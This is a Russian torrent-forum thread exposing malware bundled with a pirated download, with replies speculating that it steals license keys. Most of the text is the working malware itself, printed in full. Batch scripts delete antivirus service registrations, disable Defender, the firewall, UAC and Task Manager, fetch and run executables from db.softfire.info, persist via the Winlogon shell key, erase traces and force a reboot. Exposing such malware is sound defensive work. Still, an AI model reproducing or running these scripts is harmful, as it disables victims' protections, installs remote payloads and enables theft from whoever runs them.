Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
)
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE4.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE3.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP20.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP19.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MsMpSvc" /f
Reg Add "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /v "Start" /t REG_DWORD /d "4" /f
bcdedit /deletevalue "{current}" safeboot
reg add "HKLM\SYSTEM\CurrentControlset\Control\Nls\Language" /v "Default" /t REG_SZ /d "0409" /f
regedit /s %windir%\usw.reg
regedit /s %windir%\d.reg
set /a tz=(%random%%%4)+1
if %tz% == 1 regedit /s %windir%\at.reg
if %tz% == 2 regedit /s %windir%\ct.reg
if %tz% == 3 regedit /s %windir%\et.reg
if %tz% == 4 regedit /s %windir%\mt.reg
del %windir%\Set-up.exe
del %windir%\at.reg
del %windir%\ct.reg
del %windir%\et.reg
del %windir%\mt.reg
del %windir%\c.exe
del %windir%\usw.reg
del %windir%\d.reg
del %windir%\b.bat
shutdown /r /f /t 10
del %0
::
::
Код: выделить все
@echo off
set "url=http://db.softfire.info/rs/st"
::
::
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (set "bits=32") else set "bits=64"
regedit /s %windir%\mgr_f.reg
timeout /t 30
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if exist "%windir%\fr.exe" (
goto start_fr
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if not exist "%windir%\fr.exe" exit
goto start_fr
)
:e
timeout /t 60
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if exist "%windir%\e.bat" (
start %windir%\e.exe
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if not exist "%windir%\e.bat" exit
start %windir%\e.exe
)
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 0 (
regedit /s %windir%\e.reg
del %windir%\e.reg
del %windir%\fr.exe
del %windir%\d.exe
del %windir%\s.txt
del %0
) else (
regedit /s %windir%\mgr_n.reg
exit
)
:start_fr
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 1 start %windir%\fr.exe
goto e
::
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
"ConsentPromptBehaviorUser"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend]
"Start"=dword:00000005

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc]
"Start"=dword:00000004
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:000000f0
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-82"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-82"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Atlantic Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:000000f0
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:00000168
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-151"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-152"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Central America Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000000
"ActiveTimeBias"=dword:00000168
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:0000012c
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-112"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-112"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Eastern Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:0000012c
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:000001a4
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-192"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-192"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Mountain Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:000001a4
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,c.exe"
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,d.exe"
Код: выделить все
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,e.exe"
Просмотр потрохов exe файлов. Запуск этих файлов не проверялся, вскрытие тоже не производилось по причине отсутствия необходимых мощностей и инструментов. Скриншоты в спойлере.
Eastoop ®
Зам.Куратора Программ
Стаж: 11 лет 1 мес.
Сообщений: 14254
Ratio: 188,826
Поблагодарили: 59668
100%
Откуда: UTC+10
nnm-club.gif
Насколько я понял своим скудным умишком, целью всей этой требухи является не сбор логинов и паролей, а кража лицензионных ключей. Возможно для их последующей перепродажи.
anatm
Uploader 100+
 
Стаж: 8 лет 9 мес.
Сообщений: 272
Ratio: 596,518
100%
ussr.gif
Eastoop писал(а): Перейти к сообщению
Насколько я понял своим скудным умишком


Скромняга :респект:
AleksKochemir
Uploader 100+
Стаж: 8 лет 2 мес.
Сообщений: 597
Ratio: 1365,051
Раздал: 168,5 TB
100%
Откуда: Тамбов
russia.gif
Благодарность всем, кто предпринял все необходимые меры для выявления зловредной деятельности!!! Очень познавательно. Обязательно делитесь такими обзорами.
Показать сообщения:   
Начать новую тему   Ответить на тему    Торрент-трекер NNM-Club -> Софт и все вокруг -> Защита данных Часовой пояс: GMT + 3
Страница 1 из 1